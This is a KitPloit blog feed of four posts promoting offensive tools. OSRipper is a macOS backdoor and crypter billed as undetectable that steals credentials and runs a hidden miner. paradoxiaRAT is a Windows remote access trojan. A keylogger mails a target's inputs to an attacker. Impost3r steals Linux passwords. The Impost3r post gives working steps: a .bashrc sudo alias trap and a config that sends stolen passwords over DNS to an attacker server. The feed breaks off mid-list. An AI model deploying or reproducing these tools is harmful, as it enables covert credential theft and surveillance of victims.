tag:blogger.com,1999:blog-83172222311336605472024-03-19T02:21:46.575-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger23125tag:blogger.com,1999:blog-8317222231133660547.post-68343441882737084952022-09-22T08:30:00.001-03:002022-09-22T08:30:00.205-03:00OSRipper - AV Evading OSX Backdoor And Crypter Framework<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbR92Al9Iu7-v4Ki-Atw6q3w8R3epKooAWQ5K4feSMG2gsDCpPFUzwQvIBZHKAQll8IhsoX_DF3PhrJGfa6HOPUzIdSNUrENcm9hWtL9IM8CzSlv7J5McZvN1822KuRntsQPgIM73X_OZiaQnrgBo2omRcr1HbjiiRzmsdvgng1yKKvebWKhf-0dZlA/s350/OSRipper_1_OSRipper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="84" data-original-width="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbR92Al9Iu7-v4Ki-Atw6q3w8R3epKooAWQ5K4feSMG2gsDCpPFUzwQvIBZHKAQll8IhsoX_DF3PhrJGfa6HOPUzIdSNUrENcm9hWtL9IM8CzSlv7J5McZvN1822KuRntsQPgIM73X_OZiaQnrgBo2omRcr1HbjiiRzmsdvgng1yKKvebWKhf-0dZlA/s16000/OSRipper_1_OSRipper.png" /></a></div><p><br /></p>
<p dir="auto">OSripper is a fully <a href="https://www.kitploit.com/search/label/Undetectable" target="_blank" title="undetectable">undetectable</a> Backdoor <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="generator">generator</a> and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.</p>
<p dir="auto"><strong>You can also PM me on discord for support or to ask for new features SubGlitch1#2983</strong></p><p dir="auto"><span></span></p><a name='more'></a><strong><br /></strong><p></p>
<h2 dir="auto">Features</h2>
<ul dir="auto">
<li>FUD (for macOS)</li>
<li>Cloacks as an official app (Microsoft, ExpressVPN etc)</li>
<li>Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)</li>
<li>Encrypted communications</li>
<li>Rootkit-like Behaviour</li>
<li>Every Backdoor generated is entirely unique</li>
</ul>
<h2 dir="auto">Description</h2>
<p dir="auto">Please check the wiki for information on how OSRipper functions (which changes extremely frequently)</p>
<p dir="auto"><a href="https://github.com/SubGlitch1/OSRipper/wiki" rel="nofollow" target="_blank" title="https://github.com/SubGlitch1/OSRipper/wiki">https://github.com/SubGlitch1/OSRipper/wiki</a></p>
<p dir="auto">Here are example backdoors which were generated with OSRipper</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06eulcwA3cFF-LHX-87KhIJo45Naa70fncqKpjU46vsiT5wprhGdT18yzMO3fg3hciMMFyBlxx-mBIzt1Es-emEtOqaJz7-M8HhpPs218c6penNJRAOGP3YXF3Fm8jpEu4Hrd555rV6rc81KTJ2moGHsECfYg6nZLK-Exo83j5rW_2leLKsolLlgLGg/s790/OSRipper_3_example.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="790" data-original-width="580" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06eulcwA3cFF-LHX-87KhIJo45Naa70fncqKpjU46vsiT5wprhGdT18yzMO3fg3hciMMFyBlxx-mBIzt1Es-emEtOqaJz7-M8HhpPs218c6penNJRAOGP3YXF3Fm8jpEu4Hrd555rV6rc81KTJ2moGHsECfYg6nZLK-Exo83j5rW_2leLKsolLlgLGg/w470-h640/OSRipper_3_example.png" width="470" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1_n3eqs-u1R7A-7gpkBA5nJXACaKRNd2YKVZgDtO7HgIcn1EsTKm1Z2JeyDa1fZ0fjYRuGvyOJGbxd8cKEa7X1CjdoQ45FhsQm9s9z54exYkj1_YTQSApbcWDC1R2ZWgaVoY_2npfW50pyL35YKnCk9BTvnZqPvTsvF54ec1CH19uX30aGbA2E_9xYA/s2615/OSRipper_4_vt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1590" data-original-width="2615" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1_n3eqs-u1R7A-7gpkBA5nJXACaKRNd2YKVZgDtO7HgIcn1EsTKm1Z2JeyDa1fZ0fjYRuGvyOJGbxd8cKEa7X1CjdoQ45FhsQm9s9z54exYkj1_YTQSApbcWDC1R2ZWgaVoY_2npfW50pyL35YKnCk9BTvnZqPvTsvF54ec1CH19uX30aGbA2E_9xYA/w640-h390/OSRipper_4_vt.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip3h53atetp7WHcekT2iEVypTbmEKLlrrSV9WxEZ41utdqF_AfI4SeN5ovGrI1biRvJTDUsIBOMPXF-XdjfgnzzRW0x_XoQINlAZhTv_6oIe1wrcLVxbhoXOXhPLVw3cGXPc2QezS6iJ0o6jvA7aC3sA5xCPU0rlqk6B3X-qcFmajK1wDyEEnQOSBAPg/s2741/OSRipper_5_vt_app.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1611" data-original-width="2741" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip3h53atetp7WHcekT2iEVypTbmEKLlrrSV9WxEZ41utdqF_AfI4SeN5ovGrI1biRvJTDUsIBOMPXF-XdjfgnzzRW0x_XoQINlAZhTv_6oIe1wrcLVxbhoXOXhPLVw3cGXPc2QezS6iJ0o6jvA7aC3sA5xCPU0rlqk6B3X-qcFmajK1wDyEEnQOSBAPg/w640-h376/OSRipper_5_vt_app.png" width="640" /></a></div><p dir="auto"><br /></p>
<p dir="auto"> macOS .apps will look like this on vt</p>
<h2 dir="auto">Getting Started</h2>
<h3 dir="auto">Dependencies</h3>
<p dir="auto">You need python. If you do not wish to download python you can download a compiled release.
The python dependencies are specified in the requirements.txt file.</p>
<p dir="auto">Since Version 1.4 you will need <a href="https://www.kitploit.com/search/label/Metasploit" target="_blank" title="metasploit">metasploit</a> installed and on path so that it can handle the meterpreter listeners.</p>
<h2 dir="auto">Installing</h2>
<h3 dir="auto">Linux</h3>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt"><pre><code>apt install git python -y<br />git clone https://github.com/SubGlitch1/OSRipper.git<br />cd OSRipper<br />pip3 install -r requirements.txt</code></pre></div>
<h3 dir="auto">Windows</h3>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt"><pre><code>git clone https://github.com/SubGlitch1/OSRipper.git<br />cd OSRipper<br />pip3 install -r requirements.txt</code></pre></div>
<p dir="auto">or download the latest release from <a href="https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3" rel="nofollow" target="_blank" title="https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3">https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3</a></p>
<h3 dir="auto">Executing program</h3>
<p dir="auto">Only this</p>
<div><pre><code>sudo python3 main.py<br /></code></pre></div>
<h2 dir="auto">Contributing</h2>
<p dir="auto">Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well</p>
<h2 dir="auto">Roadmap</h2>
<h3 dir="auto">v0.1</h3>
<ul dir="auto">
<li><div>✅Get down detection to 0/26 on antiscan.me</div></li>
<li><div>✅Add Changelog</div></li>
<li><div>✅Daemonise Backdoor</div></li>
<li><div>✅Add Crypter</div></li>
<li><div>✅Add More Backdoor templates</div></li>
<li><div>✅Get down detection to at least 0/68 on VT (for mac malware)</div></li>
</ul>
<h3 dir="auto">v0.2</h3>
<ul dir="auto">
<li><div>✅Add AntiVM</div></li>
<li>[] Implement tor hidden services</li>
<li><div>✅Add Logger</div></li>
<li><div>✅Add Password stealer</div></li>
<li>[] Add KeyLogger</li>
<li><div>✅Add some new evasion options</div></li>
<li><div>✅Add SilentMiner</div></li>
<li>[] Make proper C2 server</li>
</ul>
<h3 dir="auto">v0.3</h3>
<p dir="auto">Coming soon</p>
<h2 dir="auto">Help</h2>
<p dir="auto">Just open a issue and ill make sure to get back to you</p>
<h2 dir="auto">Changelog</h2>
<ul dir="auto">
<li>
<p dir="auto">0.2.1</p>
<ul dir="auto">
<li>OSRipper will now pull all information from the Target and send them to the <a href="https://www.kitploit.com/search/label/C2%20Server" target="_blank" title="c2 server">c2 server</a> over sockets. This includes information like browser history, passwords, system information, keys and etc.</li>
</ul>
</li>
<li>
<p dir="auto">0.1.6</p>
<ul dir="auto">
<li>Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared</li>
</ul>
</li>
<li>
<p dir="auto">0.1.5</p>
<ul dir="auto">
<li>Added Crypter</li>
</ul>
</li>
<li>
<p dir="auto">0.1.4</p>
<ul dir="auto">
<li>Added 4th Module</li>
</ul>
</li>
<li>
<p dir="auto">0.1.3</p>
<ul dir="auto">
<li>Got detection on VT down to 0. Made the Proccess invisible</li>
</ul>
</li>
<li>
<p dir="auto">0.1.2</p>
<ul dir="auto">
<li>Added 3rd module and listener</li>
</ul>
</li>
<li>
<p dir="auto">0.1.1</p>
<ul dir="auto">
<li>Initial Release</li>
</ul>
</li>
</ul>
<h2 dir="auto">License</h2>
<p dir="auto">MIT</p>
<h2 dir="auto">Acknowledgments</h2>
<p dir="auto">Inspiration, code snippets, etc.</p>
<ul dir="auto">
<li><a href="https://github.com/htr-tech/PyObfuscate" rel="nofollow" target="_blank" title="htr">htr</a></li>
<li><a href="https://github.com/cedowens/SwiftBelt" rel="nofollow" target="_blank" title="swiftbelt">swiftbelt</a></li>
</ul>
<h2 dir="auto">Support</h2>
<p dir="auto">I am very sorry to even write this here but my finances are not looking good right now.
If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional</p>
<p dir="auto">BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T</p>
<h2 dir="auto">Disclaimer</h2>
<p dir="auto">I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.</p>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SubGlitch1/OSRipper" rel="nofollow" target="_blank" title="Download OSRipper">Download OSRipper</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-76651298695618524852020-11-10T08:30:00.012-03:002020-11-10T08:30:00.795-03:00paradoxiaRAT - Native Windows Remote Access Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-2OMBa4O_Omw/X6iEh6TOGrI/AAAAAAAAUSk/AGux3zKuZzkooB1dXf3UpCQNQYNzSKVXwCNcBGAsYHQ/s1082/paradoxiaRAT_1_logo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="163" data-original-width="1082" height="96" src="https://1.bp.blogspot.com/-2OMBa4O_Omw/X6iEh6TOGrI/AAAAAAAAUSk/AGux3zKuZzkooB1dXf3UpCQNQYNzSKVXwCNcBGAsYHQ/w640-h96/paradoxiaRAT_1_logo.png" width="640" /></a></div><p><br /></p> Paradoxia <a href="https://www.kitploit.com/search/label/Remote%20Access" target="_blank" title="Remote Access">Remote Access</a> Tool. <br /><span><a name='more'></a></span><div><br /><span style="font-size: x-large;"><b>Features</b></span><br /> <br /><b>Paradoxia Console</b></div><div><b><br /></b> <table> <tr> <th>Feature</th> <th>Description</th> </tr> <tr> <td>Easy to use</td> <td>Paradoxia is extremely easy to use, So far the easiest rat!</td> </tr> <tr> <td>Root Shell</td> <td>-</td> </tr> <tr> <td>Automatic Client build</td> <td>Build Paradoxia Client easily with or without the icon of your choice.</td> </tr> <tr> <td>Multithreaded</td> <td>Multithreaded Console server, You can get multiple sessions.</td> </tr> <tr> <td>Toast Notifications</td> <td>Desktop notification on new session</td> </tr> <tr> <td>Configurable Settings</td> <td>Configurable values in <code>paradoxia.ini</code></td> </tr> <tr> <td>Kill Sessions</td> <td>Kill Sessions without getting in sesssion.</td> </tr> <tr> <td>View Session information</td> <td>View Session information without getting in Session.</td> </tr> </table> <br /><b>Paradoxia Client</b><br /><br /><table> <tr> <th>Feature</th> <th>Description</th> </tr> <tr> <td>Stealth</td> <td>Runs in background.</td> </tr> <tr> <td>Full File Access</td> <td>Full access to the entire file system.</td> </tr> <tr><td>Persistence</td> <td>Installs inside APPDATA and has startup persistence via Registry key.</td> </tr> <tr> <td>Upload / Download Files</td> <td>Upload and download files.</td> </tr> <tr> <td>Screenshot</td> <td>Take screenshot.</td> </tr> <tr> <td>Mic Recording</td> <td>Record Microphone.</td> </tr> <tr> <td>Chrome Password Recovery</td> <td>Dump Chrome Passwords using Reflective DLL (Does not work on latest version)</td> </tr> <tr> <td>Keylogger</td> <td>Log Keystrokes and save to file via Reflective DLL.</td> </tr> <tr> <td>Geolocate</td> <td>Geolocate Paradoxia Client.</td> </tr> <tr> <td>Process Info</td> <td>Get Process information.</td> </tr> <tr> <td>DLL Injection</td> <td>Reflective <a href="https://www.kitploit.com/search/label/DLL%20Injection" target="_blank" title="DLL Injection">DLL Injection</a> over Socket, Load your own Reflective DLL, OR use ones available <a href="https://github.com/quantumcored/maalik/tree/master/payloads" rel="nofollow" target="_blank" title="here">here</a>.</td> </tr> <tr> <td>Power off</td> <td>Power off the Client system.</td> </tr> <tr> <td>Reboot</td> <td>Reboot the client system.</td> </tr> <tr> <td>MSVC + MINGW Support</td> <td>Visual studio project is also included.</td> </tr> <tr> <td>Reverse Shell</td> <td>Stable Reverse Shell.</td> </tr> <tr> <td>Small Client</td> <td>Maximum size is 30kb without icon.</td> </tr> </table> <br /><span style="font-size: x-large;"><b>Installation (via APT)</b></span><br /> <div><pre><code>$ git clone https://github.com/quantumcored/paradoxia<br />$ cd paradoxia<br />$ sudo ./install.sh</code></pre></div> <br /><span style="font-size: x-large;"><b>Example Usage :</b></span><br /> <ul> <li>Run Paradoxia</li> </ul> <pre><code>sudo python3 paradoxia.py<br /></code></pre> <ul> <li>Once in paradoxia Console, The first step would be to build the Client, Preferrably with an Icon.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-78K4jAA8TFk/X6iEtAID_II/AAAAAAAAUSo/vENXkn4tfB8PIfgmajYM9Js2sIPBntGBQCNcBGAsYHQ/s720/paradoxiaRAT_3_pd1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="307" data-original-width="720" height="272" src="https://1.bp.blogspot.com/-78K4jAA8TFk/X6iEtAID_II/AAAAAAAAUSo/vENXkn4tfB8PIfgmajYM9Js2sIPBntGBQCNcBGAsYHQ/w640-h272/paradoxiaRAT_3_pd1.png" width="640" /></a></div><p> </p> <ul> <li>After that's built, As you can see below it is detected by <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> as a severe malware. Which is expected since it IS malware.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1nn4-hFXhaY/X6iEzAkRtuI/AAAAAAAAUSw/6W9qRaPI3QQ2Y9HxsSl5B_WBQMmpSa9kACNcBGAsYHQ/s522/paradoxiaRAT_4_pd2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="522" src="https://1.bp.blogspot.com/-1nn4-hFXhaY/X6iEzAkRtuI/AAAAAAAAUSw/6W9qRaPI3QQ2Y9HxsSl5B_WBQMmpSa9kACNcBGAsYHQ/s16000/paradoxiaRAT_4_pd2.png" /></a></div><p> </p> <ul> <li>I'm going to transfer the client on a <a href="https://www.kitploit.com/search/label/Windows%2010" target="_blank" title="Windows 10">Windows 10</a> Virtual machine and execute it. After Executing it, It appears under Startup programs in task manager.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-rilXASL1VCU/X6iE5cXLL4I/AAAAAAAAUS0/dnKlYc7-NmUD0uLC2O8ubZQzXdZq0QvhwCNcBGAsYHQ/s645/paradoxiaRAT_5_pd3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="303" data-original-width="645" src="https://1.bp.blogspot.com/-rilXASL1VCU/X6iE5cXLL4I/AAAAAAAAUS0/dnKlYc7-NmUD0uLC2O8ubZQzXdZq0QvhwCNcBGAsYHQ/s16000/paradoxiaRAT_5_pd3.png" /></a></div><p> </p> <ul> <li>Also it has copied itself inside Appdata directory and installed under the name we specified during build.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-l3Po8aWSndo/X6iE-sUDfjI/AAAAAAAAUS8/MSoBQOySdBQ2zIAXsGcGnj6kQOhNJqw9gCNcBGAsYHQ/s635/paradoxiaRAT_6_pdmiss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="277" data-original-width="635" src="https://1.bp.blogspot.com/-l3Po8aWSndo/X6iE-sUDfjI/AAAAAAAAUS8/MSoBQOySdBQ2zIAXsGcGnj6kQOhNJqw9gCNcBGAsYHQ/s16000/paradoxiaRAT_6_pdmiss.png" /></a></div><p> </p> <ul> <li>At the same time, I get a session at server side.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tq5Vh2qW3lk/X6iFELdImCI/AAAAAAAAUTA/1bRTKpgidwIGR0igWndG1NGNMEnx4_fkwCNcBGAsYHQ/s428/paradoxiaRAT_7_pd4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="428" src="https://1.bp.blogspot.com/-tq5Vh2qW3lk/X6iFELdImCI/AAAAAAAAUTA/1bRTKpgidwIGR0igWndG1NGNMEnx4_fkwCNcBGAsYHQ/s16000/paradoxiaRAT_7_pd4.png" /></a></div><p><br /></p> <ul> <li>First thing I'd do is get in the session and view information.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-STajv6__jVo/X6iFKKxrNfI/AAAAAAAAUTI/V-26BVQsq-kPLDsz1IuY_AZjyS47zA8JQCNcBGAsYHQ/s355/paradoxiaRAT_8_pd5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="228" data-original-width="355" src="https://1.bp.blogspot.com/-STajv6__jVo/X6iFKKxrNfI/AAAAAAAAUTI/V-26BVQsq-kPLDsz1IuY_AZjyS47zA8JQCNcBGAsYHQ/s16000/paradoxiaRAT_8_pd5.png" /></a></div><p> </p> <ul> <li>There are plenty of things we can do right now, but for example only, I will demonstrate keylogging.</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-IXckOjyHZQM/X6iFRMPqBrI/AAAAAAAAUTQ/qoI7sZXcp5gKNgZMQ9CjieVqILKghLMFQCNcBGAsYHQ/s438/paradoxiaRAT_9_pd7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="226" data-original-width="438" src="https://1.bp.blogspot.com/-IXckOjyHZQM/X6iFRMPqBrI/AAAAAAAAUTQ/qoI7sZXcp5gKNgZMQ9CjieVqILKghLMFQCNcBGAsYHQ/s16000/paradoxiaRAT_9_pd7.png" /></a></div><p> </p> <p>You can see in the image above that It says it successfully injected dll, And in file listing there is a file named <code>log.log</code>, Which contains the logged keystrokes.</p> <ul> <li>Lets view captures keystrokes.</li></ul><div><br /></div><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-fUuYOzNfNBU/X6iFXbEdToI/AAAAAAAAUTY/rX-AywROmoEhtwU2bRcYdI5JXJkh-NwIgCNcBGAsYHQ/s596/paradoxiaRAT_10_pd8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="579" data-original-width="596" src="https://1.bp.blogspot.com/-fUuYOzNfNBU/X6iFXbEdToI/AAAAAAAAUTY/rX-AywROmoEhtwU2bRcYdI5JXJkh-NwIgCNcBGAsYHQ/s16000/paradoxiaRAT_10_pd8.png" /></a></div><br /><p></p><span style="font-size: x-large;"><b>Changelogs</b></span><br /> <ul> <li>This repository was home to 3 tools previously, <a href="https://github.com/quantumcored/iris" rel="nofollow" target="_blank" title="Iris">Iris</a>, <a href="https://github.com/quantumcored/thawne" rel="nofollow" target="_blank" title="Thawne">Thawne</a> and Previous version of Paradoxia. This can be found <a href="https://github.com/quantumcored/paradoxiaRAT/tree/930a396cb64744de0d8cd14e55540a97ba9fa452" rel="nofollow" target="_blank" title="here">here</a>.</li> <li>Everything is entirely changed, Client has been rewritten, Infodb removed. Much new features added. Stability added.</li> </ul> <br /><span style="font-size: large;"><b>Developer</b></span><br /> <p>Hi my name's <a href="https://github.com/quantumcore" rel="nofollow" target="_blank" title="Fahad">Fahad</a>. You may contact me, on <a href="https://discordapp.com/invite/8snh7nx" rel="nofollow" target="_blank" title="Discord">Discord</a> or <a href="https://quantumcored.com/" rel="nofollow" target="_blank" title="My Website">My Website</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/quantumcored/paradoxiaRAT" rel="nofollow" target="_blank" title="Download paradoxiaRAT">Download paradoxiaRAT<br /></a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-49309963479680081212020-07-19T18:00:00.000-04:002020-07-19T18:00:12.878-04:00Keylogger - Get Keyboard, Mouse, ScreenShot, Microphone Inputs From Target Computer And Send To Your Mail<span style="font-size: x-large;"><b>Inputs To Mail.</b></span><br />
Get Keyboard,Mouse,ScreenShot,Microphone Inputs and Send to your Mail. Purpose of the project is <a href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> the security of information systems<br />
<br />
<span style="font-size: large;"><b>INSTALLATION</b></span><br />
<pre><code>pip install pynput
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wSqlDnCgwvs/Xwuq0NZBmdI/AAAAAAAATHc/DIFI5637vNI0nw0hHBtnREduz0KteonKACNcBGAsYHQ/s1600/Keylogger_1_Ads%2525C4%2525B1z.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="239" data-original-width="718" height="212" src="https://1.bp.blogspot.com/-wSqlDnCgwvs/Xwuq0NZBmdI/AAAAAAAATHc/DIFI5637vNI0nw0hHBtnREduz0KteonKACNcBGAsYHQ/s640/Keylogger_1_Ads%2525C4%2525B1z.png" width="640" /></a></div>
<a name='more'></a><br />
<span style="font-size: large;"><b>USAGE</b></span><br />
•<strong>Set your own MAIL and PASSWORD on "keylogger.py".</strong><br />
•<strong>Run main.py on Target Computer</strong><br />
•<strong>Every 10 seconds,You Get the Data from the Target Computer</strong><br />
•<strong>If Target finds the Code and Open the File for Want to Learn your MAIL and Password The Program DELETE itself.</strong><br />
<br />
<span style="font-size: large;"><b>USAGE TEMP MAIL API</b></span><br />
<br />
<b><a href="https://temp-mail.org/en/api/" rel="nofollow" target="_blank" title="https://temp-mail.org/en/api/">https://temp-mail.org/en/api/</a></b><br />
<br />
<span style="font-size: large;"><b>ANTIVIRUS TEST</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-RJ_f1jq8KQ8/Xwuq_DUJpdI/AAAAAAAATHg/XHyoVYjF5jg3IpBOmvvsDVK6hK3bmt9pACNcBGAsYHQ/s1600/Keylogger_2_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="211" data-original-width="682" height="198" src="https://1.bp.blogspot.com/-RJ_f1jq8KQ8/Xwuq_DUJpdI/AAAAAAAATHg/XHyoVYjF5jg3IpBOmvvsDVK6hK3bmt9pACNcBGAsYHQ/s640/Keylogger_2_1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Gjuj06R1yaE/Xwuq_Ogmr4I/AAAAAAAATHk/ef8uXSWRvLAHxwGFjEq4h7xz40K6z4XqwCNcBGAsYHQ/s1600/Keylogger_3_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="385" data-original-width="987" height="248" src="https://1.bp.blogspot.com/-Gjuj06R1yaE/Xwuq_Ogmr4I/AAAAAAAATHk/ef8uXSWRvLAHxwGFjEq4h7xz40K6z4XqwCNcBGAsYHQ/s640/Keylogger_3_2.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aydinnyunus/Keylogger" rel="nofollow" target="_blank" title="Download Keylogger">Download Keylogger</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-18820222589150219202020-06-08T17:30:00.000-04:002020-06-08T17:30:10.334-04:00Impost3r - A Linux Password Thief<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Kn5lary_ATs/Xt3HlwvQ1oI/AAAAAAAASsc/TN5IWlHNmFgkjXijxQh_IcNC2C8kfLAogCNcBGAsYHQ/s1600/Impost3r_1_Impost3r.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1068" height="154" src="https://1.bp.blogspot.com/-Kn5lary_ATs/Xt3HlwvQ1oI/AAAAAAAASsc/TN5IWlHNmFgkjXijxQh_IcNC2C8kfLAogCNcBGAsYHQ/s640/Impost3r_1_Impost3r.png" width="640" /></a></div>
<br />
Impost3r is a tool that aim to steal many kinds of linux passwords(including ssh,su,sudo) written by C.<br />
Attackers can use Impost3r to make a trap to steal the legal user's passwords XD<br />
<blockquote>
This tool is limited to security research and teaching, and the user
bears all legal and related responsibilities caused by the use of this
tool! The author does not assume any legal and related responsibilities!</blockquote>
<a name='more'></a><h2>
Features</h2>
<ul>
<li>Automatically clean the track</li>
<li>Use DNS to transfer the result</li>
<li>Really hard for legal users can feel this attack</li>
</ul>
<h2>
Dependencies</h2>
<ul>
<li>gcc</li>
</ul>
<h2>
Usage</h2>
Impost3r can be used to steal passwords including sudo, su, and ssh
services. These three services can be roughly divided into two
categories, sudo and ssh/su. I will discuss them below<br />
<h2>
Steal sudo password</h2>
Only need ordinary user's privilege,and can only steal current user's password.<br />
<ul>
<li>
First i will assume that attacker has controled a server and the privilege is ordinary user<br />
</li>
<li>
Then copy the original .bashrc file <code>cp ~/.bashrc /tmp/</code>,and put this copy anywhere you like(In this case,i will use /tmp/)<br />
</li>
<li>
Edit the original .bashrc,and add following sentences at the end of
file(The param "/tmp/.impost3r" must be as the same as the following
FILENAME you specified):<br />
</li>
</ul>
<pre><code>alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'
</code></pre>
<ul>
<li>
Then,save it and run <code>source ~/.bashrc</code><br />
</li>
<li>
After that,attacker needs to edit the source code of Impost3r<code>/sudo/main.c</code>:<br />
</li>
</ul>
<pre><code>/*
Custom setting
*/
# define FILENAME "/tmp/.impost3r" \\Set the location where the Impost3r is on the server you attack.
# define BACKUP_BASHRC "/tmp/.bashrc" \\Set the location where the backup .bashrc is on the server you attack.
# define SAVE_OR_SEND 0 \\Set the method you want to apply when Impost3r get the password,(send to your server=0,save the result on the current server=1,default is send)
/*
Send to server
*/
# define MAX_RESEND 30 \\Set the maximum times that Impost3r will try to resends stealing result to attacker's server
# define RESEND_INTERVAL 5 \\Set the interval of resending stealing result.
# define REMOTE_ADDRESS "192.168.0.12" \\Set the malicious server ip address that you want to receive stealing result
# define REMOTE_PORT 53 \\Set the malicious server port
/*
Save to local
*/
# define SAVE_LOCATION "/tmp/.cache" \\Set the result file location if you want to save the result on the server
</code></pre>
<ul>
<li>
Save the source code,and run <code>make</code><br />
</li>
<li>
Get the .impost3r file after compiling.<br />
</li>
<li>
Upload .impost3r file to the target server and put it under the FILENAME you specified.<br />
</li>
<li>
The last thing you should do is run a dns server service on your
server(REMOTE_ADDRESS)'s port(REMOTE_PORT),and waiting for the bonus.<br />
</li>
</ul>
<h3>
</h3>
<h3>
Demo</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uh5ZwggxxxM/Xt3HtDkAEyI/AAAAAAAASsg/wybAshFhHfgkqmHkHykyyATDhOmM2wDxgCNcBGAsYHQ/s1600/Impost3r_6.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="954" data-original-width="1600" height="380" src="https://1.bp.blogspot.com/-uh5ZwggxxxM/Xt3HtDkAEyI/AAAAAAAASsg/wybAshFhHfgkqmHkHykyyATDhOmM2wDxgCNcBGAsYHQ/s640/Impost3r_6.gif" width="640" /></a></div>
<br />
<h3>
Tips</h3>
<ul>
<li>When Impost3r steal the sudo password successfully,it will automatically clean the traces it make on the target server.</li>
</ul>
<h2>
Steal ssh/su password</h2>
Stealing the ssh/su password is different from the sudo password
stealing method above. You need root privilege.And this method can steal
all user's password<br />
The following uses Ubuntu as an example, Centos is similar,but the file locations mentioned may be slightly different<br />
<ul>
<li>
